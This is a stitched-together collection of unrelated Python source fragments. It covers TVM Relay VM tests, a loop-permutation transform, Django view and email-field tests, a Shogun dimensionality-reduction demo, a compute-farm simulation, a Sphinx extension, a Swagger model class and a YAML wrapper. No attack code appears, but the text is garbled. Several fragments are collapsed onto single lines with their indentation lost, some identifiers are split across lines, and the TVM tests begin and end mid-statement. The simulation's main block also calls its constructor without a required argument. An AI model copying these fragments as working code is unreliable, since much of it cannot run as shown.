            self._handle_syntaxerror(e, pkg, import_str)


# Lazily-initialized application-level registry proxy.
specs = RegistryProxy("jasmine.specs", JasmineSpecsAutoDiscoveryRegistry)
lt([i_data], i_data, mod=mod) def test_sum_loop(): mod = relay.module.Module({}) sum_up = relay.GlobalVar('sum_up') i = relay.var('i', shape=[], dtype='int32') accum = relay.var('accum', shape=[], dtype='int32') sb = ScopeBuilder() with sb.if_scope(relay.equal(i, relay.const(0, 'int32'))): sb.ret(accum) with sb.else_scope(): one_less = relay.subtract(i, relay.const(1, 'int32')) new_accum = relay.add(accum, i) sb.ret(relay.Call(sum_up, [one_less, new_accum])) func = relay.Function([i, accum], sb.get()) mod[sum_up] = func loop_bound = 0 i_data = np.array(loop_bound, dtype='int32') accum_data = np.array(0, dtype='int32') iarg = relay.var('i', shape=[], dtype='int32') aarg = relay.var('accum', shape=[], dtype='int32') mod["main"] = relay.Function([iarg, aarg], sum_up(iarg, aarg)) check_result([i_data, accum_data], sum(range(1, loop_bound + 1)), mod=mod) def test_tuple_fst(): ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))]) tup = relay.var('tup', type_annotation=ttype) f = relay.Function([tup], relay.TupleGetItem(tup, 0)) i_data = np.random.rand(41).astype('float32') j_data = np.random.rand(10).astype('float32') mod = relay.Module() mod["main"] = f check_result([(i_data, j_data)], i_data, mod=mod) def test_tuple_second(): ttype = relay.TupleType([relay.TensorType((1,)), relay.TensorType((10,))]) tup = relay.var('tup', type_annotation=ttype) f = relay.Function([tup], relay.TupleGetItem(tup, 1)) i_data = np.random.rand(41).astype('float32') j_data = np.random.rand(10).astype('float32') mod = relay.Module() mod["main"] = f check_result([(i_data, j_data)], j_data, mod=mod) def test_list_constructor(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) f = relay.Function([], one4) mod["main"] = f result = veval(mod) assert len(result) == 2 assert len(result[1]) == 2 obj = vmobj_to_list(result) tvm.testing.assert_allclose(obj, 
np.array([3,2,1])) def test_let_tensor(): sb = relay.ScopeBuilder() shape = (1,) x = relay.var('x', shape=shape, dtype='float32') x1 = relay.var('x1', shape=shape, dtype='float32') x1 = sb.let(x1, x) xplusone = x1 + relay.const(42.0, 'float32') sb.ret(xplusone) body = sb.get() f = relay.Function([x], body) x_data = np.random.rand(*shape).astype('float32') mod = relay.Module() mod["main"] = f check_result([x_data], x_data + 42.0, mod=mod) def test_let_scalar(): sb = relay.ScopeBuilder() x = relay.var('x', 'float32') x1 = sb.let('x1', x) xplusone = x1 + relay.const(42.0, 'float32') sb.ret(xplusone) body = sb.get() f = relay.Function([x], body) x_data = np.array(np.random.rand()).astype('float32') mod = relay.Module() mod["main"] = f check_result([x_data], x_data + 42.0, mod=mod) def test_compose(): mod = relay.Module() p = Prelude(mod) compose = p.compose # add_one = fun x -> x + 1 sb = relay.ScopeBuilder() x = relay.var('x', 'float32') x1 = sb.let('x1', x) xplusone = x1 + relay.const(1.0, 'float32') sb.ret(xplusone) body = sb.get() add_one = relay.GlobalVar("add_one") add_one_func = relay.Function([x], body) # add_two = compose(add_one, add_one) sb = relay.ScopeBuilder() y = relay.var('y', 'float32') add_two_func = sb.let('add_two', compose(add_one_func, add_one_func)) add_two_res = add_two_func(y) sb.ret(add_two_res) add_two_body = sb.get() mod[add_one] = add_one_func f = relay.Function([y], add_two_body) mod["main"] = f x_data = np.array(np.random.rand()).astype('float32') result = veval(mod, [x_data]) tvm.testing.assert_allclose(result.asnumpy(), x_data + 2.0) def test_list_hd(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l hd = p.hd one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) three = hd(one4) f = relay.Function([], three) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(result.asnumpy(), 3) @pytest.mark.xfail def test_list_tl_empty_list(): mod = relay.Module() p 
= Prelude(mod) nil = p.nil l = p.l tl = p.tl f = relay.Function([], tl(nil())) mod["main"] = f result = veval(mod) print(result) def test_list_tl(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons l = p.l tl = p.tl one2 = cons(relay.const(1), nil()) one3 = cons(relay.const(2), one2) one4 = cons(relay.const(3), one3) f = relay.Function([], tl(one4)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([2,1])) def test_list_nth(): expected = list(range(10)) for i in range(len(expected)): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons nth = p.nth l = nil() for i in reversed(expected): l = cons(relay.const(i), l) f = relay.Function([], nth(l, relay.const(i))) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(result.asnumpy(), expected[i]) def test_list_update(): expected = list(range(10)) mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons update = p.update l = nil() # create zero initialized list for i in range(len(expected)): l = cons(relay.const(0), l) # set value for i, v in enumerate(expected): l = update(l, relay.const(i), relay.const(v)) f = relay.Function([], l) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array(expected)) def test_list_length(): expected = list(range(10)) mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons length = p.length l = nil() # create zero initialized list for i in range(len(expected)): l = cons(relay.const(0), l) l = length(l) f = relay.Function([], l) mod["main"] = f result = veval(mod) tvm.
testing.assert_allclose(result.asnumpy(), 10) def test_list_map(): mod = relay.Module() p = Prelude(mod) x = relay.var('x', 'int32') add_one_func = relay.Function([x], relay.const(1) + x) nil = p.nil cons = p.cons
map = p.map l = cons(relay.const(2), cons(relay.const(1), nil())) f = relay.Function([], map(add_one_func, l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 2])) def test_list_foldl(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons foldl = p.foldl x = relay.var("x") y = relay.var("y") rev_dup_func = relay.Function([y, x], cons(x, cons(x, y))) l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], foldl(rev_dup_func, nil(), l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([3, 3, 2, 2, 1, 1])) def test_list_foldr(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons foldr = p.foldr x = relay.var("x") y = relay.var("y") identity_func = relay.Function([x, y], cons(x, y)) l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], foldr(identity_func, nil(), l)) mod["main"] = f result = veval(mod) tvm.testing.assert_allclose(vmobj_to_list(result), np.array([1, 2, 3])) def test_list_sum(): mod = relay.Module() p = Prelude(mod) nil = p.nil cons = p.cons sum = p.sum l = cons(relay.const(1), cons(relay.const(2), cons(relay.const(3), nil()))) f = relay.Function([], sum(l)) mo
#
# Contain the transformation procedure (loop permutation)
#

import sys
import module.loop.ast


# -----------------------------------------
def __makeForLoop(id, lbound, ubound, stride, loop_body):
    '''Generate a for loop: for (id=lbound; id<=ubound; id=id+stride) loop_body

    Any of lbound/ubound/stride may be None/empty; the corresponding slot of
    the generated ForStmt is then left empty (None).
    '''

    init_exp = None
    test_exp = None
    iter_exp = None
    if lbound:
        # id = lbound
        init_exp = module.loop.ast.BinOpExp(id.replicate(), lbound.replicate(),
                                            module.loop.ast.BinOpExp.EQ_ASGN)
    if ubound:
        # id <= ubound
        test_exp = module.loop.ast.BinOpExp(id.replicate(), ubound.replicate(),
                                            module.loop.ast.BinOpExp.LE)
    if stride:
        # id = id + stride
        it = module.loop.ast.BinOpExp(id.replicate(), stride.replicate(),
                                      module.loop.ast.BinOpExp.ADD)
        iter_exp = module.loop.ast.BinOpExp(id.replicate(), it,
                                            module.loop.ast.BinOpExp.EQ_ASGN)
    return module.loop.ast.ForStmt(init_exp, test_exp, iter_exp, loop_body.replicate())


# -----------------------------------------
def transform(stmt, arg_info):
    '''Perform code transformation (permute a perfect loop nest).

    stmt     -- the statement (expected to be a loop nest) to transform
    arg_info -- a 1-tuple whose element is the desired loop order: a sequence
                of (index_name, is_optional) pairs
    Returns the permuted loop nest; prints an error and exits the process on
    malformed input.
    '''

    # extract argument information
    loop_order, = arg_info

    # get rid of compound statement that contains only a single statement
    while isinstance(stmt, module.loop.ast.CompStmt) and len(stmt.stmts) == 1:
        stmt = stmt.stmts[0]

    # insert loop order information into a hashtable:
    # index name -> [is_optional] (init/test/iter exps are appended later)
    loop_info = {}
    for index_name, is_optional in loop_order:
        loop_info[index_name] = [is_optional]

    # create loop order (get rid of all optionality information)
    loop_order = [iname for iname, opt in loop_order]

    # extract loop control information and get the loop body
    loop_body = None
    cur_stmt = stmt
    unseen_loops = loop_order[:]
    seen_loops = []
    while True:
        if isinstance(cur_stmt, module.loop.ast.CompStmt) and len(cur_stmt.stmts) == 1:
            cur_stmt = cur_stmt.stmts[0]
            continue
        # BUG FIX: the original used reduce() without importing it, which is a
        # NameError on Python 3 (reduce lives in functools there); all() is
        # the equivalent builtin for this and-fold (True for an empty list).
        all_unseen_optional = all(loop_info[i][0] for i in unseen_loops)
        if isinstance(cur_stmt, module.loop.ast.ForStmt) and not cur_stmt.init:
            print ('error:%s:Permut: a loop is assumed to have a non-empty init exp'
                   % (cur_stmt.line_no))
            sys.exit(1)
        if (isinstance(cur_stmt, module.loop.ast.ForStmt) and
                isinstance(cur_stmt.init, module.loop.ast.BinOpExp) and
                cur_stmt.init.op_type == module.loop.ast.BinOpExp.EQ_ASGN and
                isinstance(cur_stmt.init.lhs, module.loop.ast.IdentExp)):
            # The loop's index name is taken from the "<id> = ..." init exp.
            iname = cur_stmt.init.lhs.name
            if iname in seen_loops:
                if all_unseen_optional:
                    loop_body = cur_stmt
                    break
                else:
                    print ('error:%s: loop "%s" cannot occur repeatedly'
                           % (cur_stmt.line_no, iname))
                    sys.exit(1)
            if iname not in unseen_loops:
                if all_unseen_optional:
                    loop_body = cur_stmt
                    break
                else:
                    print ('error:%s: loop "%s" is not specified in the loop order %s'
                           % (cur_stmt.line_no, iname, tuple(loop_order)))
                    sys.exit(1)
            # Record this loop's control expressions for regeneration below.
            linfo = loop_info[iname]
            linfo.append(cur_stmt.init)
            linfo.append(cur_stmt.test)
            linfo.append(cur_stmt.iter)
            unseen_loops.remove(iname)
            seen_loops.append(iname)
            cur_stmt = cur_stmt.stmt
        else:
            if all_unseen_optional:
                loop_body = cur_stmt
                break
            else:
                # Only non-optional loops count as genuinely missing.
                unfound_loops = tuple(x for x in unseen_loops if not loop_info[x][0])
                print ('error:%s: to-be-permuted loops %s do not exist'
                       % (stmt.line_no, unfound_loops))
                sys.exit(1)

    # generate the permuted loop, rebuilding from the innermost loop outward
    transformed_stmt = loop_body
    rev_loop_order = loop_order[:]
    rev_loop_order.reverse()
    for iname in rev_loop_order:
        linfo = loop_info[iname]
        if len(linfo) > 1:
            opt, init_exp, test_exp, iter_exp = linfo
            transformed_stmt = module.loop.ast.ForStmt(init_exp.replicate(),
                                                       test_exp.replicate(),
                                                       iter_exp.replicate(),
                                                       transformed_stmt)
    return transformed_stmt
import unittest

from django.test.client import Client
from django.forms import ValidationError

from fields import MultipleEmailField


class CaseTests(unittest.TestCase):
    """Smoke tests for the case views.

    Each view is fetched with the anonymous test client.  Depending on the
    deployment a view either renders (200) or redirects to the login page
    (302, occasionally 301), so both outcomes count as success.
    """

    def setUp(self):
        self.c = Client()
        self.case_id = 12345
        self.status_codes = [301, 302]

    def _assert_ok_or_redirect(self, response, redirect_codes=(302,)):
        """Pass when the response is 200 or one of *redirect_codes*.

        Replaces the repeated try/except-AssertionError pattern: same
        pass/fail semantics, one place to maintain.
        """
        if response.status_code != 200:
            self.assertIn(response.status_code, redirect_codes)

    def test_cases(self):
        response = self.c.get('/cases/')
        self._assert_ok_or_redirect(response)

    def test_case_new(self):
        response = self.c.get('/case/new/')
        self._assert_ok_or_redirect(response)

    def test_case_clone(self):
        response = self.c.get('/cases/clone/', {'case': 12197})
        self._assert_ok_or_redirect(response)

    def test_cases_changestatus(self):
        response = self.c.get('/cases/changestatus/')
        self._assert_ok_or_redirect(response)

    def test_cases_priority(self):
        response = self.c.get('/cases/priority/')
        self._assert_ok_or_redirect(response)

    def test_case_getcase(self):
        location = '/case/%s' % self.case_id
        response = self.c.get(location)
        if response.status_code == 301:
            # A permanent redirect is unexpected enough to be worth showing.
            print(response.path)
        self._assert_ok_or_redirect(response, redirect_codes=self.status_codes)

    def test_case_details(self):
        location = '/case/%s/details' % self.case_id
        response = self.c.get(location)
        # This view may answer with either 301 or 302 besides 200.
        self._assert_ok_or_redirect(response, redirect_codes=self.status_codes)

    def test_case_edit(self):
        location = '/case/%s/edit/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_history(self):
        location = '/case/%s/history/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_changecaseorder(self):
        location = '/case/%s/changecaseorder/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_attachment(self):
        location = '/case/%s/attachment/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_log(self):
        location = '/case/%s/log/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_bug(self):
        location = '/case/%s/bug/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)

    def test_case_plan(self):
        location = '/case/%s/plan/' % self.case_id
        response = self.c.get(location)
        self._assert_ok_or_redirect(response)


class Test_MultipleEmailField(unittest.TestCase):
    """Unit tests for MultipleEmailField.to_python and .clean."""

    def setUp(self):
        self.default_delimiter = ','
        self.field = MultipleEmailField(delimiter=self.default_delimiter)
        self.all_valid_emails = (
            'cqi@redhat.com',
            'cqi@yahoo.com',
            'chen@gmail.com',
        )
        self.include_invalid_emails = (
            '',
            ' cqi@redhat.com',
            'chen@sina.com',
        )

    def test_to_python(self):
        # Single address becomes a one-element list.
        value = 'cqi@redhat.com'
        pyobj = self.field.to_python(value)
        self.assertEqual(pyobj, ['cqi@redhat.com'])

        # Empty segments between delimiters are dropped.
        value = 'cqi@redhat.com,,cqi@gmail.com,'
        pyobj = self.field.to_python(value)
        self.assertEqual(pyobj, ['cqi@redhat.com', 'cqi@gmail.com'])

        # Empty-ish values normalize to an empty list.
        for value in ('', None, []):
            pyobj = self.field.to_python(value)
            self.assertEqual(pyobj, [])

    def test_clean(self):
        value = 'cqi@redhat.com'
        data = self.field.clean(value)
        self.assertEqual(data, ['cqi@redhat.com'])

        value = 'cqi@redhat.com,cqi@gmail.com'
        data = self.field.clean(value)
        self.assertEqual(data, ['cqi@redhat.com', 'cqi@gmail.com'])

        # Surrounding whitespace and empty segments are tolerated.
        value = ',cqi@redhat.com, ,cqi@gmail.com, \n'
        data = self.field.clean(value)
        self.assertEqual(data, ['cqi@redhat.com', 'cqi@gmail.com'])

        # An invalid address anywhere in the list raises.
        value = ',cqi,cqi@redhat.com, \n,cqi@gmail.com, '
        self.assertRaises(ValidationError, self.field.clean, value)

        # Required field rejects the empty string ...
        value = ''
        self.field.required = True
        self.assertRaises(ValidationError, self.field.clean, value)

        # ... while an optional field cleans it to an empty list.
        value = ''
        self.field.required = False
        data = self.field.clean(value)
        self.assertEqual(data, [])


if __name__ == '__main__':
    unittest.main()
""" Shogun demo Fernando J. Iglesias Garcia This example shows the use of dimensionality reduction methods, mainly Stochastic Proximity Embedding (SPE), although Isomap is also used for comparison. The data selected to be embedded is an helix. Two different methods of SPE (global and local) are applied showing that the global method outperforms the local one in this case. Actually the results of local SPE are fairly poor for this input. Finally, the reduction achieved with Isomap is better than the two previous ones, more robust against noise. Isomap exploits the parametrization of the input data. """ import math import mpl_toolkits.mplot3d as mpl3 import numpy as np import pylab import util from modshogun import RealFeatures from modshogun import StochasticProximityEmbedding, SPE_GLOBAL from modshogun import SPE_LOCAL, Isomap # Number of data points N = 500 # Generate helix t = np.linspace(1, N, N).T / N t = t*2*math.pi X = np.r_[ [ ( 2 + np.cos(8*t) ) * np.cos(t) ], [ ( 2 + np.cos(8*t) ) * np.sin(t) ], [ np.sin(8*t) ] ] # Bi-color helix labels = np.round( (t*1.5) ) % 2 y1 = labels == 1 y2 = labels == 0 # Plot helix fig = pylab.figure() fig.add_subplot(2, 2, 1, projection = '3d') pylab.plot(X[0, y1], X[1, y1], X[2, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], X[2, y2], 'go') pylab.title('Original 3D Helix') # Create features instance features = RealFeatures(X) # Create Stochastic Proximity Embedding converter instance converter = StochasticProximityEmbedding() # Set target dimensionality converter.set_target_dim(2) # Set strategy converter.set_strategy(SPE_GLOBAL) # Compute SPE embedding embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 2) pylab.plot(X[0, y1], X[1, y1], 'ro')
pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('SPE with global strategy') # Compute a second SPE embedding with local strategy converter.set_stra
tegy(SPE_LOCAL) converter.set_k(12) embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 3) pylab.plot(X[0, y1], X[1, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('SPE with local strategy') # Compute Isomap embedding (for comparison) converter = Isomap() converter.set_target_dim(2) converter.set_k(6) embedding = converter.embed(features) X = embedding.get_feature_matrix() fig.add_subplot(2, 2, 4) pylab.plot(X[0, y1], X[1, y1], 'ro') pylab.plot(X[0, y2], X[1, y2], 'go') pylab.title('Isomap') pylab.connect('key_press_event', util.quit) pylab.show()
#!/usr/bin/python

import computefarm as cf
from computefarm.farm import depth_first, breadth_first

import random
import logging

import numpy as np

HOUR = 60 * 60

# Default per-queue job characteristics:
#   num     -- target number of idle jobs to keep queued
#   avg/std -- mean / stddev of the Gaussian job length, in seconds
#   cpu/mem -- per-job resource request (others come from BatchJob defaults)
# NOTE(review): queues with num=0 never submit jobs, which is presumably why
# 'test' can omit 'std' -- confirm before raising its num.
default_queue_properties = {
    'grid': {'num': 0, 'mem': 750, 'avg': HOUR, 'std': 0.6 * HOUR},
    'prod': {'num': 0, 'avg': 8 * HOUR, 'std': 3 * HOUR},
    'short': {'num': 500, 'avg': 1.2 * HOUR, 'std': 600},
    'long': {'num': 500, 'avg': 5 * HOUR, 'std': 2 * HOUR},
    'test': {'num': 0, 'avg': 8 * HOUR, 'cpu': 3},
    'mp8': {'num': 0, 'avg': 6 * HOUR, 'std': 4 * HOUR, 'cpu': 8, 'mem': 6000},
}


def sort_like(array, like):
    """Yield the items of *array*: first those appearing in *like* (in
    *like*'s order), then the remaining ones in sorted order."""
    # All items in @like are picked in order if they exist in the array
    for x in like:
        if x in array:
            yield x
    # All the remaining are picked here
    for x in sorted(set(array) - set(like)):
        yield x


log = logging.getLogger('sim')


class Simulation(object):
    """Driver for the compute-farm simulation: builds the farm, attaches
    groups/queues, submits synthetic jobs and gathers usage statistics."""

    def __init__(self, nodes, negotiate_interval=150, stat_freq=10,
                 submit_interval=200):
        """
        Initialize the farm simulation, attach groups and queues to it
        and provide method of submitting jobs of a predetermined size
        into the queues.
        """
        self.farm = cf.Farm()

        # Distribution of farm nodes, e.g. 331/90 is ratio of 24/32 core machines
        dist = (
            (24, 331),
            (32, 90),
            (8, 238),
        )
        self.farm.generate_from_dist(dist, size=nodes)

        root = self.setup_groups(cf.Group('<root>'))
        self.farm.attach_groups(root)
        # Keep 100 samples per stat-frequency unit of history.
        self._init_stat(stat_freq * 100)

        # Default ranking
        self.farm.set_negotiatior_rank(depth_first)

        self.queue = cf.JobQueue()
        self.farm.attach_queue(self.queue)

        # How many seconds per negotiation/stat gathering cycle
        self.int_stat = stat_freq
        self.int_negotiate = negotiate_interval
        self.int_submit = submit_interval

        self.next_stat = 0
        self.next_negotiate = 0
        self.next_submit = 0

        # How many seconds to simulate each step
        self.sec_per_step = 5

    # these two _set* knobs are used in callbacks by the GUI
    def _set_neg_df(self):
        self.farm.set_negotiatior_rank(depth_first)

    def _set_neg_bf(self):
        self.farm.set_negotiatior_rank(breadth_first)

    def _init_stat(self, hist_size):
        """
        Statistics are kept in a constant-size numpy array that is
        updated periodically
        """
        self._stat = {}
        self._stat_size = hist_size
        for x in self.farm.groups.active_groups():
            self._stat[x.name] = np.zeros(hist_size, int)

    def _update_stat(self):
        """Shift each group's usage history left by one and append the
        current usage sample at the end."""
        self.farm.update_usage()
        for g in self.farm.groups.active_groups():
            # Left-shift entire array back by one, so element n -> element n - 1
            self._stat[g.name] = np.roll(self._stat[g.name], -1)
            # New last element is current update
            self._stat[g.name][-1] = g.usage

    def setup_groups(self, root):
        """ Reflects current ATLAS group structure:

                      /- atlas  +-- production +-- prod
                      |         |              |
                      |         |              \\-- mp8
                      |         |              |
                      |         |              \\-- test
             <root>-+           |
                      |         \\-- analysis  +-- short
                      |                        |
                      |                        \\-- long
                      \\- grid
        """
        root.add_child('atlas')
        root.add_child('grid', 3)

        root['atlas'].add_child('production')
        root['atlas'].add_child('analysis')

        root['atlas']['production'].add_child('prod', 40)
        root['atlas']['production'].add_child('mp8', 5)
        root['atlas']['production'].add_child('test', 7)

        root['atlas']['analysis'].add_child('short', 10)
        root['atlas']['analysis'].add_child('long', 10)

        # Populate with default properties from top of this module
        for x in root.walk():
            if x.name in default_queue_properties:
                x.set_character(**default_queue_properties[x.name])
        return root

    def add_jobs(self):
        """
        Submit more jobs into the queue, keeping the total idle jobs
        where they should be according to the sliders in the GUI.
        """
        for group in self.farm.groups.active_groups():
            num_submit = group.num - self.farm.queue.get_group_idle(group.name)
            if num_submit <= 0:
                continue
            log.info("Submitting %d more %s jobs", num_submit, group.name)
            # range() instead of Python-2-only xrange(): equivalent in a
            # for-loop and keeps the module importable on Python 3.
            for n in range(num_submit):
                # Job length is random within a Gaussian distribution
                length = abs(random.gauss(group.avg, group.std))
                # Create job object and add it to queue
                job = cf.BatchJob(group=group.name, cpus=group.cpu,
                                  memory=group.mem, length=length)
                self.queue.add_job(job)

    def step(self, dt):
        """
        Advance time of the simulation by dt steps at a time, making next
        submission/negotiation/statistics-gathering as appropriate
        """
        for i in range(dt):
            self.farm.advance_time(self.sec_per_step)
            if self.farm.time > self.next_submit:
                self.add_jobs()
                self.next_submit = self.farm.time + self.int_submit
            if self.farm.time > self.next_negotiate:
                self.farm.negotiate_jobs()
                self.next_negotiate = self.farm.time + self.int_negotiate
            if self.farm.time > self.next_stat:
                self._update_stat()
                self.next_stat = self.farm.time + self.int_stat

    def display_order(self):
        """Return group names in the preferred plotting order."""
        sort_order = ('short', 'long', 'test', 'prod', 'mp8')
        return list(sort_like(self._stat.keys(), sort_order))

    def make_plotdata(self, groups='all'):
        """Return (x, y) arrays of the usage history for plotting.

        BUG FIX: np.vstack was fed a generator expression, which is
        deprecated since NumPy 1.16 and rejected by newer releases; build a
        real list first.
        """
        x = np.arange(self._stat_size)
        if groups == 'all':
            rows = [self._stat[g] for g in self.display_order()]
        else:
            rows = [self._stat[g] for g in self.display_order() if g in groups]
        y = np.vstack(rows)
        return x, y


if __name__ == '__main__':
    # NOTE(review): Simulation() is called without the required `nodes`
    # argument and raises TypeError -- confirm the intended node count.
    s = Simulation()
# Note: Modified by Neui (Note: sphinx.util.compat.Directive is deprecated)
#
# Copyright (C) 2011 by Matteo Franchin
#
# This file is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# A copy of the GNU General Public License is available at
# <http://www.gnu.org/licenses/>.

from sphinx.builders.singlehtml import SingleFileHTMLBuilder
from docutils import nodes
from docutils.parsers.rst import Directive, directives
import re


class globalindex(nodes.General, nodes.Element):
    # Placeholder doctree node; it carries the directive options and is
    # filled with rendered toctree HTML in process_globalindex_nodes().
    pass


def visit_globalindex_node(self, node):
    # Emit the pre-rendered toctree HTML stored on the node.
    self.body.append(node['content'])


def depart_globalindex_node(self, node):
    # Nothing to close: visit writes the complete HTML fragment.
    pass


class GlobalIndexDirective(Directive):
    """The ``globalindex`` directive: inserts a full document toctree when
    building with the single-file HTML builder."""

    required_arguments = 0
    optional_arguments = 1
    final_argument_whitespace = True
    # Options mirror the standard toctree options.
    option_spec = \
        {'maxdepth': directives.nonnegative_int,
         'collapse': directives.flag,
         'titlesonly': directives.flag}

    def run(self):
        # Only record the options here; rendering is deferred to the
        # doctree-resolved event, when the whole toctree is known.
        node = globalindex('')
        node['maxdepth'] = self.options.get('maxdepth', 2)
        node['collapse'] = 'collapse' in self.options
        node['titlesonly'] = 'titlesonly' in self.options
        return [node]


def process_globalindex_nodes(app, doctree, fromdocname):
    # doctree-resolved handler: render the global toctree into each
    # placeholder node, but only for the single-file HTML builder; other
    # builders simply drop the placeholders.
    builder = app.builder
    if builder.name != SingleFileHTMLBuilder.name:
        for node in doctree.traverse(globalindex):
            node.parent.remove(node)
    else:
        docname = builder.config.master_doc
        for node in doctree.traverse(globalindex):
            kwargs = dict(
                maxdepth=node['maxdepth'],
                collapse=node['collapse'],
                titles_only=node['titlesonly'])
            rendered_toctree = builder._get_local_toctree(docname, **kwargs)
            # For some reason, it refers to docname.html#anchor, where just
            # #anchor is enough.
            rendered_toctree = rendered_toctree.replace(docname + ".html", '')
            # Subsections will be #section#subsection, which is invalid.
            # Removing the first #section fixes this.
            rendered_toctree = re.sub('href="(?:#[^#"]+)*(#[^"]+)"', \
                                      'href="\\1"', rendered_toctree)
            node['content'] = rendered_toctree


def setup(app):
    # Standard Sphinx extension entry point: register node, directive and
    # the resolve-time processing hook.
    app.add_node(globalindex,
                 html=(visit_globalindex_node, depart_globalindex_node))
    app.add_directive('globalindex', GlobalIndexDirective)
    app.connect('doctree-resolved', process_globalindex_nodes)
# coding: utf-8

"""
    MINDBODY Public API

    No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)  # noqa: E501

    OpenAPI spec version: v6

    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

import pprint
import re  # noqa: F401

import six


class Resource(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    """

    """
    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    swagger_types = {
        'id': 'int',
        'name': 'str'
    }

    attribute_map = {
        'id': 'Id',
        'name': 'Name'
    }

    def __init__(self, id=None, name=None):  # noqa: E501
        """Resource - a model defined in Swagger"""  # noqa: E501
        self._id = None
        self._name = None
        self.discriminator = None
        if id is not None:
            self.id = id
        if name is not None:
            self.name = name

    @property
    def id(self):
        """Gets the id of this Resource.  # noqa: E501

        The ID of the resource.  # noqa: E501

        :return: The id of this Resource.  # noqa: E501
        :rtype: int
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this Resource.

        The ID of the resource.  # noqa: E501

        :param id: The id of this Resource.  # noqa: E501
        :type: int
        """
        self._id = id

    @property
    def name(self):
        """Gets the name of this Resource.  # noqa: E501

        The name of the resource.  # noqa: E501

        :return: The name of this Resource.  # noqa: E501
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """Sets the name of this Resource.

        The name of the resource.  # noqa: E501

        :param name: The name of this Resource.  # noqa: E501
        :type: str
        """
        self._name = name

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Iterate the declared attribute names directly; the type values from
        # six.iteritems() were discarded, so the six indirection was needless
        # (plain dict iteration works on both Python 2 and 3).
        for attr in self.swagger_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        if issubclass(Resource, dict):
            for key, value in self.items():
                result[key] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, Resource):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
from django.utils import unittest
from django.contrib import admin

from hyperadmin.sites import ResourceSite


class SiteTestCase(unittest.TestCase):
    def test_install_from_admin_site(self):
        """Installing models from the default admin site populates the
        resource site's registry."""
        resource_site = ResourceSite()
        admin.autodiscover()
        resource_site.install_models_from_site(admin.site)
        self.assertTrue(resource_site.registry)
# Copyright (c) 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import ruamel.yaml


def none_representer(dumper, data):
    """Represent Python None as an explicit YAML 'null' scalar."""
    return dumper.represent_scalar('tag:yaml.org,2002:null', 'null')


class YAML(object):

    def __init__(self):
        """Wrap construction of ruamel yaml object."""
        self.yaml = ruamel.yaml.YAML()
        self.yaml.allow_duplicate_keys = True
